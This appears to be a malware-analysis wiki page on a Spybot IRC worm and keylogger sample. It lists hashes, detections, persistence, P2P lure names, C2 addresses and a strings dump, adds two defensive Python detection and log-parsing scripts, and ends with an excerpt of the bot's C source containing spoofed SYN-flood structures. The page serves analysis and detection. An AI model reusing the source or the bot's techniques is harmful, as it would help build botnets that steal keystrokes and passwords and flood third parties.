60e29751634c36ca26fd6acef4d9554e

From aldeid

Description

Summary

  • creates a persistence entry under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (value name "Winsock driver", data wuaumqr.exe)
  • copies itself to C:\WINDOWS\system32\wuaumqr.exe and drops further copies under crack/warez lure names into C:\WINDOWS\system32\kazaabackupfiles\, a directory it registers as a KaZaA shared folder
  • acts as a keylogger and writes the captured keystrokes to C:\WINDOWS\system32\keylog.txt
  • connects to 209.126.201.20 over port 6667/tcp (IRC) for command and control

Identification

MD5 60e29751634c36ca26fd6acef4d9554e
SHA1 d7d3e9b5eb1f7afed668e87110a546f856331f68
SHA256 c6c9d204f39b8828c1b40a43b2cc3657a44bb44bcd7f1a098c41837eb99ec69a
ssdeep 768:SO3rw60+UzqkC6KpKF2knPOd8V2N2QplBZbZF6kf+hukceNYuKSgSEb6z1R88zx5:LrwvnmkC7pKFTnPOaV2N2QplBZbZF6kQ
imphash e28ca57ae83b0bd404f25671983f064d
File size 43.5 KB ( 44576 bytes )
File type Win32 EXE
Magic literal PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Antivirus detection

Antivirus Result Update
AVG Worm/Spybot 20140225
Ad-Aware Generic.Keylogger.2.98176F51 20140225
Agnitum Worm.Spybot.Gen.6 20140223
AntiVir TR/Drop.Agent.CR 20140225
Antiy-AVL Worm[P2P]/Win32.SpyBot 20140225
Avast Win32:SpyBot-gen2 [Wrm] 20140225
Baidu-International Worm.Win32.SpyBot.aX 20140225
BitDefender Generic.Keylogger.2.98176F51 20140225
Bkav W32.SpybotGP.Worm 20140224
CMC Generic.Win32.60e2975163!MD 20140220
Commtouch W32/Spybot.SUXQ-1100 20140225
Comodo Worm.Win32.SpyBot.N 20140225
DrWeb Win32.HLLW.SpyBot 20140225
ESET-NOD32 Win32/SpyBot.N 20140225
Emsisoft Generic.Keylogger.2.98176F51 (B) 20140225
F-Prot W32/Spybot.N 20140225
F-Secure Generic.Keylogger.2.98176F51 20140225
Fortinet W32/SpyBot.CBFD!worm 20140225
GData Generic.Keylogger.2.98176F51 20140225
Ikarus P2P-Worm.Win32.SpyBot 20140225
Jiangmin Worm/P2P.SpyBot.n 20140225
K7AntiVirus Riskware ( 9ae59fa10 ) 20140225
K7GW Backdoor ( 00005ea41 ) 20140225
Kaspersky P2P-Worm.Win32.SpyBot.gen 20140225
Kingsoft Worm.SpyBot.n.(kcloud) 20140225
Malwarebytes Trojan.Dropper 20140225
McAfee W32/Spybot.worm.gen.a 20140225
McAfee-GW-Edition W32/Spybot.worm.gen.a 20140225
MicroWorld-eScan Generic.Keylogger.2.98176F51 20140225
Microsoft Worm:Win32/Spybot.N 20140225
NANO-Antivirus Trojan.Win32.SpyBot.fxxc 20140225
Norman Backdoor 20140224
Panda Worm Generic 20140224
Rising PE:Worm.SpyBot!1.984D 20140223
Sophos W32/Spybot-Gen 20140225
Symantec W32.Spybot.Worm 20140225
TheHacker W32/Spybot.worm.gen 20140224
TotalDefense Win32/Spybot!generic 20140225
TrendMicro WORM_SPYBOT.AA 20140225
TrendMicro-HouseCall WORM_SPYBOT.AA 20140225
VBA32 Worm.SpyBot 20140224
VIPRE Trojan.Win32.Ircbot!cobra (v) 20140225
ViRobot Worm.Win32.SpyBot.44576 20140225
nProtect Worm/W32.SpyBot.44576.D 20140225
Engines that returned no detection (engine, signature date):
AhnLab-V3 20140224
ByteHero 20130613
CAT-QuickHeal 20140225
ClamAV 20140225
Qihoo-360 20140220
SUPERAntiSpyware 20140225

Defensive capabilities

This section is still being written and is not yet complete.

Dynamic analysis

Network indicators

IRC traffic

FakeNet confirms that the malware attempts to connect to 209.126.201.20:6667/tcp (IRC). A second address, 209.126.201.22, is also present in the binary's strings; since the main loop of the source cycles through its ircservers[] list until a connection succeeds, it is most likely a fallback C2 server. The registration lines below are produced from the NICK %s and USER %s "hotmail.com" "%s" :%s format strings, so the "hotmail.com" host field is a constant of this bot family:

[Redirecting a socket destined for 209.126.201.20 to localhost.]

[Received new connection on port: 6667.]
SSL Autodetect: NOT SSL
[Received NON-SSL data on port 6667.]
 NICK malware51
 USER malware51 "hotmail.com" "127.0.0.1" :malware
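The registration exchange above is a usable network signature on its own. The following is an added example (not part of the original article or the Spybot source): a small Python checker that takes client-to-server stream records and flags the bot's hard-coded USER line and the two C2 addresses from the strings. The session records are constructed; the first one reproduces the FakeNet capture, the others are invented for contrast.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Indicators taken from this page: both addresses found in the binary's strings,
# the port seen by FakeNet, and the bot's registration format strings
# ('NICK %s' and 'USER %s "hotmail.com" "%s" :%s').
C2_ADDRESSES = {"209.126.201.20", "209.126.201.22"}
C2_PORT = 6667
NICK_LINE = re.compile(r'^NICK (\S+)$')
USER_LINE = re.compile(r'^USER (\S+) "hotmail\.com" "(\d{1,3}(?:\.\d{1,3}){3})" :(.*)$')


@dataclass
class Finding:
    dst_ip: str
    dst_port: int
    nick: Optional[str]
    reasons: List[str]


def inspect_session(dst_ip: str, dst_port: int, client_payload: str) -> Optional[Finding]:
    """Check one client->server TCP stream for this bot's IRC registration.

    Returns a Finding when the destination matches the known C2 or the payload
    carries the bot's hard-coded USER line; None for an unremarkable stream.
    """
    reasons: List[str] = []
    nick: Optional[str] = None
    for line in client_payload.splitlines():
        line = line.strip()
        m = NICK_LINE.match(line)
        if m:
            nick = m.group(1)
            continue
        m = USER_LINE.match(line)
        if m:
            reasons.append('USER line with hard-coded "hotmail.com" host field')
            if nick is not None and m.group(1) == nick:
                # In the captured session both fields carry the same generated nick
                reasons.append("USER name equals NICK")
    if dst_ip in C2_ADDRESSES and dst_port == C2_PORT:
        reasons.append(f"connection to known C2 {dst_ip}:{dst_port}")
    if not reasons:
        return None
    return Finding(dst_ip, dst_port, nick, reasons)


def scan_sessions(sessions: List[Tuple[str, int, str]]) -> List[Finding]:
    """Run inspect_session over (dst_ip, dst_port, client_payload) records."""
    return [f for f in (inspect_session(*s) for s in sessions) if f is not None]


# Constructed sample records: the first reproduces the FakeNet capture above,
# the second is an ordinary IRC client, the third uses the fallback address
# with a nick/user pair that does not match.
SAMPLE_SESSIONS = [
    ("209.126.201.20", 6667,
     'NICK malware51\r\nUSER malware51 "hotmail.com" "127.0.0.1" :malware\r\n'),
    ("10.0.0.5", 6667,
     'NICK alice\r\nUSER alice 0 * :Alice Example\r\n'),
    ("209.126.201.22", 6667,
     'NICK foo42\r\nUSER bar "hotmail.com" "192.0.2.9" :x\r\n'),
]

if __name__ == "__main__":
    for f in scan_sessions(SAMPLE_SESSIONS):
        print(f"{f.dst_ip}:{f.dst_port} nick={f.nick}: " + "; ".join(f.reasons))
```

The USER-line match is the more durable of the two checks: the C2 addresses in a 2003-era sample are long dead, but the "hotmail.com" host field is compiled into every build of this source.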

Keylogger

GetKeyState / GetAsyncKeyState calls

The keylogger thread polls the keyboard with GetKeyState / GetAsyncKeyState and reads the title of the foreground window with GetForegroundWindow / GetWindowTextA; all four appear among the import-name strings listed under Static analysis.

[Screenshot in the original article: 60e29751634c36ca26fd6acef4d9554e-keylogger.png, showing the GetKeyState / GetAsyncKeyState calls]

Copies of the malware

The malware copies itself to C:\WINDOWS\system32\wuaumqr.exe and, through the KAZAA_SPREADER block of the source (listing lines 298-319), into a kazaabackupfiles directory it creates under system32. It registers that directory as a KaZaA shared folder by writing HKEY_CURRENT_USER\SOFTWARE\KAZAA\LocalContent\Dir0 = "012345:<directory>", so the copies below are offered on the P2P network under crack/warez lure names:

  • C:\WINDOWS\system32\kazaabackupfiles\AVP_Crack.exe
  • C:\WINDOWS\system32\kazaabackupfiles\DreamweaverMX_Crack.exe
  • C:\WINDOWS\system32\kazaabackupfiles\EDU_Hack.exe
  • C:\WINDOWS\system32\kazaabackupfiles\FlashFXP_Crack.exe
  • C:\WINDOWS\system32\kazaabackupfiles\Generals_No-CD_Crack.exe
  • C:\WINDOWS\system32\kazaabackupfiles\Norton_Anti-Virus_2002_Crack.exe
  • C:\WINDOWS\system32\kazaabackupfiles\PlanetSide.exe
  • C:\WINDOWS\system32\kazaabackupfiles\Porn.exe
  • C:\WINDOWS\system32\kazaabackupfiles\Postal_2_Crack.exe
  • C:\WINDOWS\system32\kazaabackupfiles\Red_Faction_2_No-CD_Crack.exe
  • C:\WINDOWS\system32\kazaabackupfiles\Renegade_No-CD_Crack.exe
  • C:\WINDOWS\system32\kazaabackupfiles\Sitebot.exe
  • C:\WINDOWS\system32\kazaabackupfiles\Winamp_Installer.exe
  • C:\WINDOWS\system32\kazaabackupfiles\zoneallarm_pro_crack.exe
  • C:\WINDOWS\system32\wuaumqr.exe

Keylogger log file

The malware logs keystrokes to C:\WINDOWS\system32\keylog.txt. The line layout matches the format strings in the binary ("[dd:MMM:yyyy, " / " HH:mm:ss]" for the session header, "[HH:mm:ss] " followed by the foreground window title, the buffered keys and the reason the buffer was flushed: Return, Buffer full or Changed window). Here is what the file looks like; the window titles are French because the analysis VM was (Bloc-notes = Notepad, Exécuter = Run, Éditeur du Registre = Registry Editor):

[25:Feb:2014,  15:27:42] Keylogger Started

[15:30:29] C:\WINDOWS\system32\cmd.exe - CaptureBAT.exe -n -c              4 (Return)
[15:31:28] Sans titre - Bloc-notes                                         [Down][Home][Down][Down][Down][Down][Down][Down][Down][Down] (Changed window)
[15:31:30] Exécuter                                                        r[WIN]regedit (Changed window)
[15:31:38] ~res-x86.txt - Bloc-notes                                       [TAB][TAB][TAB][TAB] (Changed window)
[15:31:39] Exécuter                                                        r[WIN]regedit (Changed window)
[15:31:45] Exécuter                                                        r[WIN]regedit (Changed window)
[15:31:53] Exécuter                                                        r[WIN] (Changed window)
[15:31:54] Éditeur du Registre                                             [Print Screen] (Changed window)
[15:32:02] Exécuter                                                        r[WIN] (Changed window)
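The log is easy to turn into a timeline during incident response. The following is an added example (not code from the article or from Spybot): a Python parser for this keylog.txt layout that recovers the session start, one record per flushed buffer, the per-window key sequences and the text actually submitted with Return. The sample log is copied from the listing above with the column padding shortened; the parser only relies on two or more spaces separating the title from the keys.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Line shapes follow the format strings found in the binary:
#   "[dd:MMM:yyyy, " + " HH:mm:ss]" + " Keylogger Started"            (session header)
#   "[HH:mm:ss] " <window title, space padded> <keys> " (" <reason> ")"  (one flushed buffer)
HEADER = re.compile(r'^\[(\d\d:[A-Za-z]{3}:\d{4}),\s+(\d\d:\d\d:\d\d)\] Keylogger Started$')
ENTRY = re.compile(r'^\[(\d\d:\d\d:\d\d)\] (.*?)\s{2,}(.*?) \((Return|Buffer full|Changed window)\)$')
# A key token is either a bracketed special key such as [WIN] or a single character
TOKEN = re.compile(r'\[[^\]]+\]|.')


@dataclass
class Entry:
    time: str
    window: str   # foreground window title at the time of the flush
    keys: str     # buffered keystrokes, special keys in brackets
    reason: str   # Return, Buffer full or Changed window


def parse_keylog(text: str) -> Tuple[Optional[str], List[Entry]]:
    """Parse keylog.txt; returns (session start timestamp or None, entries).

    Assumption: window titles do not contain two consecutive spaces, since the
    first run of padding spaces is taken as the title/keys boundary.
    """
    started = None
    entries: List[Entry] = []
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        m = HEADER.match(line)
        if m:
            started = f"{m.group(1)} {m.group(2)}"
            continue
        m = ENTRY.match(line)
        if m:
            entries.append(Entry(*m.groups()))
    return started, entries


def tokens(keys: str) -> List[str]:
    """Split 'r[WIN]regedit' into ['r', '[WIN]', 'r', 'e', 'g', 'e', 'd', 'i', 't']."""
    return TOKEN.findall(keys)


def by_window(entries: List[Entry]) -> Dict[str, List[str]]:
    """Group captured key buffers by window title, preserving first-seen order."""
    grouped: Dict[str, List[str]] = {}
    for e in entries:
        grouped.setdefault(e.window, []).append(e.keys)
    return grouped


def submitted(entries: List[Entry]) -> List[Tuple[str, str]]:
    """(window, typed text) for buffers flushed by Return, special keys removed."""
    return [(e.window, "".join(t for t in tokens(e.keys) if not t.startswith("[")))
            for e in entries if e.reason == "Return"]


# Sample taken from the keylog.txt shown above (padding shortened).
SAMPLE_LOG = r"""[25:Feb:2014,  15:27:42] Keylogger Started

[15:30:29] C:\WINDOWS\system32\cmd.exe - CaptureBAT.exe -n -c      4 (Return)
[15:31:28] Sans titre - Bloc-notes      [Down][Home][Down][Down][Down][Down][Down][Down][Down][Down] (Changed window)
[15:31:30] Exécuter      r[WIN]regedit (Changed window)
[15:31:38] ~res-x86.txt - Bloc-notes      [TAB][TAB][TAB][TAB] (Changed window)
[15:31:39] Exécuter      r[WIN]regedit (Changed window)
[15:31:45] Exécuter      r[WIN]regedit (Changed window)
[15:31:53] Exécuter      r[WIN] (Changed window)
[15:31:54] Éditeur du Registre      [Print Screen] (Changed window)
[15:32:02] Exécuter      r[WIN] (Changed window)
"""

if __name__ == "__main__":
    started, entries = parse_keylog(SAMPLE_LOG)
    print("session started", started)
    for window, buffers in by_window(entries).items():
        print(f"{window!r}: {buffers}")
    print("submitted:", submitted(entries))
```

Grouping by window is what matters in practice: it shows which applications (Run dialog, Notepad, the registry editor) received input and lets you scan the submitted text for credentials without reading the whole log.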

Registry keys

The following value is created to ensure persistence over reboots:

Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Name Winsock driver
Value wuaumqr.exe
Type REG_SZ

Note that the data is a bare file name rather than a full path; it resolves because the copy lives in %SystemRoot%\system32, which is on the default search path. The source's writekeys() also decodes a RunOnce path (listing lines 30-31), but only the Run value was observed during this run.

Static analysis

Sections

Name       VirtAddr     VirtSize     RawSize      Entropy     
--------------------------------------------------------------------------------
.text      0x1000       0x6f54       0x6f54       6.001816    
.bss       0x8000       0x93c4       0x0          0.000000
.data      0x12000      0x1d24       0x1d24       4.688955    
.idata     0x14000      0xd68        0xd68        4.856590    
.rsrc      0x15000      0xd68        0xd68        5.586022

IAT

Module        Functions (names recovered from the import-name strings listed below)
wsock32.dll   WSACleanup, WSAGetLastError, WSAStartup, __WSAFDIsSet, accept, bind, closesocket, connect, gethostbyaddr, gethostbyname, getpeername, getsockname, htonl, htons, inet_addr, inet_ntoa, ioctlsocket, listen, ntohs, recv, select, send, socket
SHELL32.DLL   ShellExecuteA
winmm.dll     mciSendStringA
KERNEL32.DLL  ExitProcess, FindClose, FindFirstFileA, FindNextFileA, FreeLibrary, GetCommandLineA, GetCurrentProcess, GetDateFormatA, GetExitCodeProcess, GetFileAttributesA, GetFileSize, GetLastError, GetModuleFileNameA, GetModuleHandleA, CloseHandle, GetProcAddress, GetSystemDirectoryA, GetTickCount, GetTimeFormatA, GetVersionExA, GetWindowsDirectoryA, GlobalMemoryStatus, CopyFileA, LoadLibraryA, CreateDirectoryA, MoveFileA, OpenProcess, PeekNamedPipe, CreateFileA, ReadFile, RtlUnwind, SetFileAttributesA, SetFilePointer, CreateMutexA, Sleep, TerminateProcess, TerminateThread, CreatePipe, CreateProcessA, WriteFile, lstrcpyA, lstrcpynA, lstrlenA, CreateThread, DeleteFileA, DuplicateHandle
USER32.DLL    GetWindowTextA, GetForegroundWindow, GetKeyState, GetAsyncKeyState, MapVirtualKeyA, ExitWindowsEx, CharUpperBuffA, CharToOemA, keybd_event
ADVAPI32.DLL  GetUserNameA, RegCreateKeyA, RegCreateKeyExA, RegCloseKey, RegOpenKeyA, RegQueryValueExA, RegSetValueExA
CRTDLL.DLL    __GetMainArgs, atoi, exit, fclose, fopen, fputc, fputs, fread, fwrite, malloc, memcpy, memset, raise, rand, signal, sprintf, srand, strcat, strchr, strcmp, strncpy, strstr, strtok

Not in the import table: CreateToolhelp32Snapshot / Process32First / Process32Next, RegisterServiceProcess and MPR.DLL!WNetEnumCachedPasswords are resolved at run time through GetProcAddress (see the strings below and listing lines 326-332), so a detection that relies on the static IAT alone misses the process-killing and password-theft capabilities.

Strings

Output of a strings run over the sample. The leading entries (everything before wuaumqr.exe) are printable byte runs from the code section, mostly push-immediate and jmp-through-IAT encodings, not meaningful text. The useful strings start at wuaumqr.exe: the IRC command set, the DCC and HTTP server messages (Server: SpyBot1.2), the KaZaA lure file names, the names of the tools the F/AV killer targets (NETSTAT, TASKMGR, MSCONFIG, REGEDIT) and the two C2 addresses.

t ;t$$t
SVWUj
]_^[
SVWU
t:VU
t(x1
]_^[
=, A
h( A
h$ A
h  A
5( A
5$ A
5  A
SVWh
h8 A
58 A
h8 A
Wh8 A
ht A
h|9A
hn9A
h`9A
hb9A
PhE9A
h`9A
hA9A
h99A
PVh29A
h/9A
PSh 9A
t&Shp
"j2j
hi8A
h`9A
h[8A
hJ8A
h<8A
h28A
Wh+8A
Wh+8A
u&h{7A
hc7A
hO7A
h97A
h-7A
h$7A
h"7A
h 7A
[email protected]
h'(A
Wh'(A
h:;A
h`9A
h`9A
PhH6A
h`9A
[email protected]
t%h`9A
|h/9A
PSh 9A
h` A
h8 A
h8 A
h` A
h` A
h8 A
h8 A
h` A
_^[]
SVWjdj
h'(A
h'(A
h'(A
5L(A
tvjF
Php5A
Phe5A
ShP5A
Ph=5A
Ph-5A
Ph"5A
@_^[
5L,A
<>/t
Phm4A
hj4A
PShW4A
hl3A
hg3A
@Ph]3A
hY3A
hU3A
t hS A
hH A
hH3A
hH A
h>3A
h:3A
h63A
h,3A
h(3A
hj:A
h#3A
h&8A
hH A
[email protected] A
hH A
hH3A
hf:A
hD A
uA9E
h 9A
SVWj2j
h7(A
h7(A
h'(A
Rhv2A
he2A
hX2A
h52A
h%2A
h!2A
h%2A
u3hX2A
h'(A
Wh'(A
hb:A
Whz A
@_^[
5t-A
hx0A
hp0A
h?0A
h:0A
vOh:0A
h/9A
h00A
Phe/A
SVW1
Pha/A
\Ph^/A
hY/A
hp:A
SVWj
Y_^[
<>\u
SPhR/A
Rh&/A
Rhe.A
Ph<.A
h0.A
Ph^/A
h,.A
h%.A
8ERRRu
UPDF
RUNF
QUITj
h`9A
[email protected]
h^/A
SVW1
[email protected]
% CA
%$CA
%(CA
%,CA
%0CA
%4CA
%8CA
%<CA
%HCA
%TCA
?"u#j"
%`CA
%dCA
%hCA
%lCA
%pCA
%tCA
%xCA
%|CA
% DA
%$DA
%(DA
%,DA
%0DA
%4DA
%8DA
%<DA
%@DA
%LDA
%PDA
%TDA
%XDA
%\DA
%`DA
%dDA
%pDA
%tDA
%xDA
%|DA
wuaumqr.exe
#|-|xXx|-|
xTriplex
Winsock driver
krnel
xXx - Triple Threat - xXx
keylog.txt
tsm~
tsm~
Error operation failed
Operation completed
000.000.000.000
File doesn't exists
Searsing for passwords
PRIVMSG %s :%s
Proccess has terminated
Could not read data from proccess
\cmd.exe
c:\%s.exe
SFT05%i
connected.
PWD14438136782715101980
PWD715
%i.%i.%i.%i
Server uploaded to kuangserver IP: %s 
PRIVMSG %s :Server uploaded to kuangserver IP: %s 
Server uploaded to sub7server IP: %s port: %i
PRIVMSG %s :Server uploaded to sub7server IP: %s port: %i
Found poort %i open at ip:%s 
PRIVMSG %s :Found poort %i open at ip:%s 
%s:%i
%s%s
HTTP/1.0 200 OK
Server: SpyBot1.2
Date: %s %s GMT
Content-Type: %s
Accept-Ranges: bytes
Last-Modified: %s %s GMT
Content-Length: %i
Connection: close
ddd, dd MMM yyyy
application/octet-stream
text/html
GET 
HTTP server listining on poort: %i root dir: %s\
%s %s
PRIVMSG %s :%s %s
PRIVMSG %s :%s
WNetEnumCachedPasswords
MPR.DLL
Version:%s cpu: %dMHz. ram: %dMB total, %dMB free  %d%s in use os: Windows %s (%d.%d, build %d). uptime: %dd %dh %dm. Date: %s Time: %s Current user: %s IP address: %s Hostname: %s Windir: %s\ Systemdir: %s\
HH:mm:ss
dd:MMM:yyyy
couldn't resolve host
%s [%s]
2000
Transfer complete (size: %i bytes)
Error connecting
Error with file
Transfer complete (send: %i bytes)
Socket error
Dcc send timeout
DCC SEND %s %i %i %i
Type list path+filter to get my file list
Example:
list C:\*.*
$CHAN
%s%s%s
$NICK
login
PRIVMSG
KICK
PART
NICK
NICK %s
JOIN %s
JOIN %s %s
PONG %s
PING
Found: %i files and %i dirs
</PRE></HTML>
PRIVMSG %s :Found %i files and %i dirs
%s  (%i bytes)
<p><A href="%s%s">%s</A> (%i bytes)
PRIVMSG %s :%s (%i bytes)
<%s>
<li><A href="%s%s/">%s</A></li> <b><u>(Directory)</b></u>
PRIVMSG %s :[%s]
<li><A href="%s">Parent Directory</A></li>
Searsing for: %s
<HTML><PRE>
PRIVMSG %s :Searsing for: %s
PRIVMSG %s :%s
PRIVMSG %s :(%s)
10  %s
(%s) 
10 %s
[HH:mm:ss] 
%s (Return
%s (Buffer full
%s (Changed window
 Keylogger Started
 HH:mm:ss]
[dd:MMM:yyyy, 
NICK %s
 USER %s "hotmail.com" "%s" :%s
%d.%d.%d.%d
%s%i
Administrator
more
SynFlooding: %s port: %i delay: %i times:%i.
bla bla blaaaasdasd
Portscanner startip: %s port: %i delay: %ssec.
Portscanner startip: %s port: %i delay: %ssec. logging to: %s
kuang
sub7
%i.%i.%i.0
scan
redirect %s:%i > %s:%i
redirect
CHAT
SEND
rename
%s Address http://%s:%i/ .
%s %s
httpserver
Thread killed (%s)
killthread
sendkeys
killprocess
set CDAudio door open
cd-rom drive opened
set CDAudio door closed
cd-rom drive closed
cd-rom
list
makedir
execute
delete
cmd.exe has started type "cmd help" for commands
opencmd
QUIT Bye Bye
reboot
quit
disconnect
keyboardlights
QUIT
QUIT
reconnect
listprocesses
Keylogger stoped
stopkeylogger
Keylogger logging to %s
Keylogger active output to: DCC chat
Keylogger active output to: %s
error already logging keys to %s use "stopkeylogger" to stop
startkeylogger
passwords
info
PRIVMSG %s :%s
%i: %s
threads
Keylogger logging to %s\%s
F/AV Killer
Process32Next
Process32First
CreateToolhelp32Snapshot
RegisterServiceProcess
kernel32.dll
open
Dir0
SOFTWARE\KAZAA\LocalContent
012345:%s
%s\kazaabackupfiles\
%s\%s
[Num Lock]
[Down]
[Right]
[Up]
[Left]
[Pg Dn]
[End]
[Del]
[Pg Up]
[Home]
[Insert]
[Scroll Lock]
[Print Screen]
[WIN]
[CTRL]
[TAB]
[F12]
[F11]
[F10]
[F9]
[F8]
[F7]
[F6]
[F5]
[F4]
[F3]
[F2]
[F1]
[ESC]
EDU_Hack.exe
Sitebot.exe
Winamp_Installer.exe
PlanetSide.exe
DreamweaverMX_Crack.exe
FlashFXP_Crack.exe
Postal_2_Crack.exe
Red_Faction_2_No-CD_Crack.exe
Renegade_No-CD_Crack.exe
Generals_No-CD_Crack.exe
Norton_Anti-Virus_2002_Crack.exe
Porn.exe
AVP_Crack.exe
zoneallarm_pro_crack.exe
NETSTAT.EXE
TASKMGR.EXE
MSCONFIG.EXE
REGEDIT.EXE
MODE $CHAN +ntsm
MODE $NICK +i
209.126.201.22
209.126.201.20
WSACleanup
WSAGetLastError
WSAStartup
__WSAFDIsSet
accept
bind
closesocket
connect
gethostbyaddr
gethostbyname
getpeername
getsockname
htonl
htons
inet_addr
inet_ntoa
ioctlsocket
listen
ntohs
recv
select
send
socket
ShellExecuteA
mciSendStringA
ExitProcess
FindClose
FindFirstFileA
FindNextFileA
FreeLibrary
GetCommandLineA
GetCurrentProcess
GetDateFormatA
GetExitCodeProcess
GetFileAttributesA
GetFileSize
GetLastError
GetModuleFileNameA
GetModuleHandleA
CloseHandle
GetProcAddress
GetSystemDirectoryA
GetTickCount
GetTimeFormatA
GetVersionExA
GetWindowsDirectoryA
GlobalMemoryStatus
CopyFileA
LoadLibraryA
CreateDirectoryA
MoveFileA
OpenProcess
PeekNamedPipe
CreateFileA
ReadFile
RtlUnwind
SetFileAttributesA
SetFilePointer
CreateMutexA
Sleep
TerminateProcess
TerminateThread
CreatePipe
CreateProcessA
WriteFile
lstrcpyA
lstrcpynA
lstrlenA
CreateThread
DeleteFileA
DuplicateHandle
GetWindowTextA
GetForegroundWindow
GetKeyState
GetAsyncKeyState
MapVirtualKeyA
ExitWindowsEx
CharUpperBuffA
CharToOemA
keybd_event
GetUserNameA
RegCreateKeyA
RegCreateKeyExA
RegCloseKey
RegOpenKeyA
RegQueryValueExA
RegSetValueExA
__GetMainArgs
atoi
exit
fclose
fopen
fputc
fputs
fread
fwrite
malloc
memcpy
memset
raise
rand
signal
sprintf
srand
strcat
strchr
strcmp
strncpy
strstr
strtok
wsock32.dll
SHELL32.DLL
winmm.dll
KERNEL32.DLL
USER32.DLL
ADVAPI32.DLL
CRTDLL.DLL
aZNKJJ==b
aa^I
aj<65KK466
ac;81
2?46
 18>o
 /7CCBX
GC71
w27CBLOR
FC?89
wC?BMRRVn
ROFCX
w?CORV^^k
wCOR\_]
wMO_X
nkjj
ovuif
ztiv
!!&,*&
!$++&#
<#*,'#
',*$
ie[k|
!&,+&
iee|
!&+,'#

Source code

   1 //////////////////////////////////////////////////////////
   2 //							//
   3 //		Spybot1.2b beta by Mich			//
   4 //							//
   5 //		Opensource irc bot 			//
   6 //							//
   7 //	    IRC: irc.babbels.com #dreams		//
   8 //	    						//
   9 //	http://members.lycos.co.uk/ircspybot/		//
  10 //	    						//
  11 //	      [email protected]		//
  12 //	    						//
  13 //		use at your own risk.			//
  14 //							//
  15 //	       Good luck and have fun!			//
  16 //							//
  17 //////////////////////////////////////////////////////////
  18 
  19 #define WIN32_LEAN_AND_MEAN
  20 
  21 #include <winsock2.h>
  22 #include <stdio.h>
  23 #include <shellapi.h>
  24 #include <wininet.h>
  25 #include <mmsystem.h>
  26 #include "settings.h"
  27 
  28 char nick[100];
  29 char realname[250];
  30 char runoncekey[] = "tpguxbsf}nŠ„“”‡•}xŠ…˜”}d–““†•w†“”Š}s–p„†";
  31 char runkey[] = "tpguxbsf}nŠ„“”‡•}xŠ…˜”}d–““†•w†“”Š}s–";
  32 
  33 //variables
  34 
  35 char dcchost[20];
  36 char dccfilename[MAX_PATH];
  37 char sendtochan[50];
  38 int dccport;
  39 int redirect_to_port;
  40 SOCKET redirectsock_in;
  41 SOCKET dcchosts;
  42 SOCKET dccspy = 0;
  43 BOOL info = FALSE;
  44 HANDLE pipe_read;
  45 HANDLE pipe_write;
  46 HANDLE pipe_Hproc;
  47 HANDLE hChildInWrDupe;
  48 SOCKET pipesock;
  49 char pipe_chan[50]; 
  50 char IRC_server[500];
  51 
  52 
  53 #ifdef SYN_FLOOD
  54 DWORD WINAPI syn_flood(LPVOID param);
  55 
  56 typedef struct syn_struct {
  57 	char host[100];
  58 	int port;
  59 	int delay;
  60 	int times;
  61 	int thread;
  62 	int state;
  63 } syndata;
  64 
  65 syndata syn[30];
  66 
  67 #endif
  68 
  69 #ifdef SPOOFD_SYNFLOOD
  70 
  71 //Spoofd synflood source comes from teslas sdbot edition i have only changed some think (its better) 
  72 
  73 DWORD WINAPI Spoofd_syn(LPVOID param);
  74 
  75 typedef struct Spoofd_syn_struct {
  76 	unsigned long TargetIP;
  77 	int port;
  78 	int delay;
  79 	int times;
  80 	int thread;
  81 	int state;
  82 	SOCKET sock;
  83 } Spoofd_syndata;
  84 
  85 Spoofd_syndata Spoofdsyn[30];
  86 
  87 #define IP_HDRINCL 2 
  88 
  89 typedef struct ip_hdr 
  90 { 
  91 	unsigned char h_verlen; 
  92 	unsigned char tos; 
  93 	unsigned short total_len; 
  94 	unsigned short ident; 
  95 	unsigned short frag_and_flags; 
  96 	unsigned char ttl; 
  97 	unsigned char proto; 
  98 	unsigned short checksum; 
  99 	unsigned int sourceIP; 
 100 	unsigned int destIP; 
 101 }IPHEADER; 
 102 
 103 typedef struct tsd_hdr 
 104 { 
 105 	unsigned long saddr; 
 106 	unsigned long daddr; 
 107 	char mbz; 
 108 	char ptcl; 
 109 	unsigned short tcpl; 
 110 }PSDHEADER; 
 111 
 112 typedef struct tcp_hdr 
 113 { 
 114 	USHORT th_sport; 
 115 	USHORT th_dport; 
 116 	unsigned int th_seq; 
 117 	unsigned int th_ack; 
 118 	unsigned char th_lenres; 
 119 	unsigned char th_flag; 
 120 	USHORT th_win; 
 121 	USHORT th_sum; 
 122 	USHORT th_urp; 
 123 }TCPHEADER; 
 124 
 125 
 126 USHORT checksum(USHORT *buffer, int size) 
 127 { 
 128 	unsigned long cksum=0; 
 129 	while(size >1) 
 130 	{ 
 131 		cksum+=*buffer++; 
 132 		size -=sizeof(USHORT); 
 133 	} 
 134 	if(size ) 
 135 	{ 
 136 		cksum += *(UCHAR*)buffer; 
 137 	} 
 138 
 139 	cksum = (cksum >> 16) + (cksum & 0xffff); 
 140 	cksum += (cksum >>16); 
 141 	return (USHORT)(~cksum); 
 142 } 
 143 
 144 #endif
 145 
 146 #ifdef SUB7_SPREADER
 147 int sub7(SOCKET sock);
 148 #endif
 149 
 150 #ifdef KUANG2_SPREADER
 151 int KUANG(SOCKET sock);
 152 #endif
 153 
 154 char logins[maxlogins][50]={ 0 };
 155 int sendkeysto = 0;
 156 DWORD nSize = 240;
 157 SOCKET keysock;
 158 char keylogchan[50];
 159 int distime = 1800000;
 160 const char Error[] = "Error operation failed";
 161 const char OK[] = "Operation completed";
 162 char IP[] = "000.000.000.000";
 163 const char No_File[] = "File doesn't exists";
 164 
 165 // function prototypes
 166 DWORD WINAPI download(LPVOID param);
 167 char * Regreadkey(int num);
 168 void regwritekey(char *serv,int num);
 169 DWORD WINAPI port_redirect(LPVOID param);
 170 SOCKET Listen(int port);
 171 SOCKET create_sock(char *host, int port);
 172 void Close_Handles();
 173 DWORD WINAPI PipeReadThread(LPVOID param);
 174 int pipe_send(SOCKET sock,char *chan,char *buf);
 175 int open_cmd(SOCKET sock,char * chan);
 176 DWORD WINAPI PipeReadThread(LPVOID param);
 177 void Keyevent (BYTE key,BOOL caps);
 178 int HTTP_server(char *dir,int poort);
 179 DWORD WINAPI port_scanner(LPVOID param);
